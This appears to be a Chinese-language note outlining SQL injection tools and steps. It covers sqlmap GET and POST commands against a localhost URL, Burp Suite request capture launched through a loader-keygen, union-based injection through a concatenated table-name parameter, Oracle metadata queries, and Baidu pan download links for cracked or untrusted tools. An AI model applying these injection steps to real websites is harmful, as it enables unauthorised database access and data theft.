詳細請看:https://mubu.com/doc/7m3poBzabXi
SQL注入_工具與指南
- 使用工具:
- sqlmap
- 鏈接:https://pan.baidu.com/s/1xdncbzZfE864WjeHfJWTHw
- 提取碼:9vd1
- 抓包工具:burp suite
- 鏈接:https://pan.baidu.com/s/1YI9PpIwiatJFLgpAUuxdJA
- 提取碼:vgnz
- (詳細教程:https://www.cnblogs.com/fairyting/p/12604201.html)
- 數據操作工具:sqlplus
- 鏈接:https://pan.baidu.com/s/1r9KploJifmYWJM6tlsa9MA
- 提取碼:84i1(下有詳細安裝教程)
- Kali鏡像下載:
- 鏈接:https://pan.baidu.com/s/1c98a42JTimSR2s5EoFcgCQ
- 提取碼:54j1
- Nessus 漏洞掃描文件:
- 鏈接:https://pan.baidu.com/s/1an8q6hLlyJeNZYadQ5oMKg
- 提取碼:zsk8
- 阿D注入工具(綠色放心使用):
- 鏈接:https://pan.baidu.com/s/1Exruns-eTs3f6bt377dUYQ
- 提取碼:gm5c
- SQLMAP安裝教程:解壓,放到python對應的安裝目錄中(新建sqlmap文件夾)例如:
- SQLMAP(https://www.cnblogs.com/php09/p/10404560.html)
- 啟動方式:(E:\Python\sqlmap>python sqlmap.py -h)
- 使用Get 進行SQL注入:
- E:\Python\sqlmap>python sqlmap.py -u "http://localhost:8080/HomeSubHtml/DataNews/Content.jsp?id=ODQ5&classname=TkVXU19JTkZPUk1BVElPTgAA" -p classname -f --level 4 --risk 3
- 使用POST掃描注入SQL(https://www.cnblogs.com/php09/p/10404560.html)
- 使用busp suite 進行抓包
- 1,推薦使用火狐瀏覽器,修改瀏覽器代理(cmd 到安裝路徑出入:java -Xmx2g -jar burp-loader-keygen.jar)
- 使用busp suite 進行抓包
- 修改代理(建議8080--》9999)
- 火狐修改代理
- 抓包數據
- 攔截包(跳轉時關,獲取時開)
- 對上述的信息放到txt文檔中,進行保存
- 然后輸入:python sqlmap.py -r ./workplace/test.txt -f 進行搜查
- Busp Suite 詳細使用方法可看(Web安全深度剖析)
- SQLPLUS:
- 下載文件(11版):http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html
- 可直接下載百度網盤
- 鏈接:https://pan.baidu.com/s/1O-qQHDVqqvYPp06ttdRoIA
- 提取碼:i35k
- 可直接下載百度網盤
- 下載文件(11版):http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html
- 2.解壓兩個包將兩個包的所有文件放在同一目錄下
- 3.配置sqlplus 的配置文件
- 在步驟2的目錄下新建 network/admin目錄並且新建文件 tnsnames.ora
- 4.tnsnames.ora的格式如下
- orcl=
- (DESCRIPTION =
- (ADDRESS_LIST=
- (ADDRESS=(PROTOCOL = TCP)(HOST = 192.168.62.200)(PORT = 1521))
- )
- (CONNECT_DATA =
- (SERVER = DEDICATED)
- (SERVICE_NAME = 198.168.62.200BT)
- )
- )
- 5.可以設置將當前目錄加入path 環境變量中以方便操作系統查找 sqlplus.exe 的運行程序
- 最后輸入
- 大致語句注入方法(以新聞資訊為例):
- 1,在網頁中找到form/ajax(看到他的servlet位置)
- 最終找到相應的dao層代碼和他的sql語句
- "select id, Theme,NETTIME,CREATE_TIME from (select id, Theme,CREATE_TIME,NETTIME from "+classname+" where show1=1 order by CREATE_TIME desc, NETTIME desc ) where rownum<=10";
- 可知他的classname為注入點
- Union方法
- 在網址鏈接中加入 union select null,null,null,null ....... from dual
- 簡單獲取元數據
- --查看表空間
- select tablespace_name from user_tablespaces;
- --查看當前用戶所有表
- select table_name from user_tables ;
- --查看當前用戶所有列
- select column_name from user_tab_columns where table_name='NEWS_INFORMATION';
- --查看當前用戶所有對象(表明、約束、索引)
- select object_name from user_objects;
- 后可通過暴力猜解(通常用軟件)
- 使用Kali虛擬機安裝Nessus-8.5.1 進行漏洞掃描:
- 阿D注入工具(巨簡單):
- 可見其注入點
- 百度教程即可: